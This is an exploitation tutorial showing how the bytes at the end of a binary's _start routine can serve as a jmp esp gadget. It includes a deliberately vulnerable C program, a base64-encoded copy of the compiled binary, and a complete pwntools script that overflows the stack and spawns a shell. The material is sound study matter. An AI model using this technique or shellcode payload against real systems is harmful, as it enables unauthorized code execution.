x86 ELF Stack Overflow Jmp Esp (Rsp) Trick

In short: a `jmp esp` (`jmp rsp`) gadget can be found in almost every dynamically linked ELF binary. On x86 it comes from the last byte of the `call __libc_start_main@plt` in `_start` followed by the `hlt` opcode (`ff f4`), as shown below.

Here's a common `_start` from an x86 ELF binary:

080488d3 <_start>:
 80488d3:       31 ed                   xor    ebp,ebp
 80488d5:       5e                      pop    esi
 80488d6:       89 e1                   mov    ecx,esp
 80488d8:       83 e4 f0                and    esp,0xfffffff0
 80488db:       50                      push   eax
 80488dc:       54                      push   esp
 80488dd:       52                      push   edx
 80488de:       68 80 8f 04 08          push   0x8048f80
 80488e3:       68 10 8f 04 08          push   0x8048f10
 80488e8:       51                      push   ecx
 80488e9:       56                      push   esi
 80488ea:       68 b0 88 04 08          push   0x80488b0
 80488ef:       e8 cc fe ff ff          call   80487c0 <__libc_start_main@plt>
 80488f4:       f4                      hlt
 80488f5:       66 90                   xchg   ax,ax
 80488f7:       66 90                   xchg   ax,ax
 80488f9:       66 90                   xchg   ax,ax
 80488fb:       66 90                   xchg   ax,ax
 80488fd:       66 90                   xchg   ax,ax
 80488ff:       90                      nop

08048900 <__x86.get_pc_thunk.bx>:
 8048900:       8b 1c 24                mov    ebx,DWORD PTR [esp]
 8048903:       c3                      ret

Using the instruction-truncation (misaligned decoding) trick, disassemble from 0x080488f3, i.e. starting at the last byte of the `call`'s rel32 operand:

 80488f3:       ff f4                   push   esp
 80488f5:       66 90                   xchg   ax,ax
 80488f7:       66 90                   xchg   ax,ax
 80488f9:       66 90                   xchg   ax,ax
 80488fb:       66 90                   xchg   ax,ax
 80488fd:       66 90                   xchg   ax,ax
 80488ff:       90                      nop
 8048900:       8b 1c 24                mov    ebx,DWORD PTR [esp]
 8048903:       c3                      ret

Which, since `xchg ax,ax` and `nop` are no-ops, is equivalent to:

 80488f3:       ff f4                   push   esp
 8048900:       8b 1c 24                mov    ebx,DWORD PTR [esp]
 8048903:       c3                      ret

Recall that `push $ADDR; ret` is equivalent to `jmp $ADDR`, so this `push esp; ...; ret` sequence behaves like `jmp esp` (the intervening `mov ebx, DWORD PTR [esp]` only clobbers ebx).

So whenever a binary runs without NX (DEP) — that is, with an executable stack, as the sample below forces with `-zexecstack` — this gadget is very useful.

Sample

easybof.c:

// gcc-4.8 easybof.c -o easybof -m32 -zexecstack -fno-stack-protector -D_FORTIFY_SOURCE=0 -O3
#include <unistd.h>

/*
 * Deliberately vulnerable sample: an 8-byte stack buffer is filled by a
 * read() of up to 128 bytes, so input past the buffer overwrites the rest
 * of the frame, including the saved return address (the exploit below
 * relies on exactly that).  The build line above turns off the mitigations
 * that would normally catch or block this: -fno-stack-protector (no canary),
 * -zexecstack (executable stack) and -D_FORTIFY_SOURCE=0 (no checked read).
 */
int main()
{
    char buff[8];

    write(1, "Overflow me plz:", 16);
    read(0, buff, 128);   /* the overflow: 128-byte read into an 8-byte buffer */
}

exploit.py:

#!/usr/bin/env python2
from pwn import * # pip2 install pwntools

# Monkey-patch a helper onto pwntools' ELF: yield the first hit of a raw
# byte signature in the loaded binary.
# NOTE(review): the lambda ignores `self` and closes over the module-level
# `elf` bound below, so it only works because a single ELF is loaded here;
# `next(self.search(sig))` would be the correct form.
ELF.find = lambda self, sig: next(elf.search(sig))

elf = ELF('easybof')

# Gadget addresses, located by byte search (see the disassembly above):
# a lone `ret` (c3), and the misaligned `ff f4` (`push esp`) that starts the
# push esp; ...; ret sequence.  The key includes the preceding `ff` from the
# call's rel32, hence the +1 to point at the second `ff`.
ret = elf.find('\xc3')
jmp_esp = elf.find('\xff\xff\xf4') + 1

print 'RET     gadget at 0x%.8x' % ret
print 'JMP_ESP gadget at 0x%.8x' % jmp_esp

# Target architecture for asm()/shellcraft below.
context(arch='i386', os='linux')

io = process('./easybof')

# Stack payload: filler made of `ret` addresses, then the gadget address,
# then the shellcode that execution reaches via the gadget's `ret`
# (see the gadget discussion above).
shellcode = asm(shellcraft.sh())
payload = p32(ret) * 6 + p32(jmp_esp) + shellcode

# Wait for the prompt, then send exactly 128 bytes to match the
# read(0, buff, 128) in easybof.c.
io.recvuntil(':')
io.send(payload.ljust(128))
# Run one command in the spawned shell and echo its first output line
# (trailing newline stripped) before handing the session to the user.
io.sendline('id')
print io.recvline()[:-1]

io.interactive()

easybof.elf (base64 encoded):

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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQhAQIMIQECAAAAAABAAAAAQAAAAwA
AADIggQIDQAAAOSEBAgZAAAACJ8ECBsAAAAEAAAAGgAAAAyfBAgcAAAABAAAAPX+/2+sgQQIBQAAACyCBAgGAAAAzIEECAoAAABQAAAACwAAABAAAAAVAAAA
AAAAAAMAAAAAoAQIAgAAABgAAAAUAAAAEQAAABcAAACwggQIEQAAAKiCBAgSAAAACAAAABMAAAAIAAAA/v//b4iCBAj///9vAQAAAPD//298ggQIAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSfBAgAAAAAAAAAAAaDBAgWgwQIJoMECAAAAAAAAAAAR0NDOiAoVWJ1bnR1
IDQuOC41LTR1YnVudHUyKSA0LjguNQAALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRhZwAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0
YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuamNyAC5keW5hbWljAC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1l
bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAABAAAAAgAAAFSBBAhUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAATAAAA
BwAAAAIAAABogQQIaAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAIQAAAAcAAAACAAAAiIEECIgBAAAkAAAAAAAAAAAAAAAEAAAAAAAAADQAAAD2//9vAgAAAKyB
BAisAQAAIAAAAAUAAAAAAAAABAAAAAQAAAA+AAAACwAAAAIAAADMgQQIzAEAAGAAAAAGAAAAAQAAAAQAAAAQAAAARgAAAAMAAAACAAAALIIECCwCAABQAAAA
AAAAAAAAAAABAAAAAAAAAE4AAAD///9vAgAAAHyCBAh8AgAADAAAAAUAAAAAAAAAAgAAAAIAAABbAAAA/v//bwIAAACIggQIiAIAACAAAAAGAAAAAQAAAAQA
AAAAAAAAagAAAAkAAAACAAAAqIIECKgCAAAIAAAABQAAAAAAAAAEAAAACAAAAHMAAAAJAAAAQgAAALCCBAiwAgAAGAAAAAUAAAAYAAAABAAAAAgAAAB8AAAA
AQAAAAYAAADIggQIyAIAACMAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAAGAAAA8IIECPACAABAAAAAAAAAAAAAAAAQAAAABAAAAIIAAAABAAAABgAAADCD
BAgwAwAACAAAAAAAAAAAAAAACAAAAAAAAACLAAAAAQAAAAYAAABAgwQIQAMAAKIBAAAAAAAAAAAAABAAAAAAAAAAkQAAAAEAAAAGAAAA5IQECOQEAAAUAAAA
AAAAAAAAAAAEAAAAAAAAAJcAAAABAAAAAgAAAPiEBAj4BAAAGQAAAAAAAAAAAAAABAAAAAAAAACfAAAAAQAAAAIAAAAUhQQIFAUAACwAAAAAAAAAAAAAAAQA
AAAAAAAArQAAAAEAAAACAAAAQIUECEAFAADAAAAAAAAAAAAAAAAEAAAAAAAAALcAAAAOAAAAAwAAAAifBAgIDwAABAAAAAAAAAAAAAAABAAAAAAAAADDAAAA
DwAAAAMAAAAMnwQIDA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAzwAAAAEAAAADAAAAEJ8ECBAPAAAEAAAAAAAAAAAAAAAEAAAAAAAAANQAAAAGAAAAAwAAABSf
BAgUDwAA6AAAAAYAAAAAAAAABAAAAAgAAACGAAAAAQAAAAMAAAD8nwQI/A8AAAQAAAAAAAAAAAAAAAQAAAAEAAAA3QAAAAEAAAADAAAAAKAECAAQAAAYAAAA
AAAAAAAAAAAEAAAABAAAAOYAAAABAAAAAwAAABigBAgYEAAACAAAAAAAAAAAAAAABAAAAAAAAADsAAAACAAAAAMAAAAgoAQIIBAAAAQAAAAAAAAAAAAAAAEA
AAAAAAAA8QAAAAEAAAAwAAAAAAAAACAQAAAjAAAAAAAAAAAAAAABAAAAAQAAAAEAAAADAAAAAAAAAAAAAABDEAAA+gAAAAAAAAAAAAAAAQAAAAAAAAA=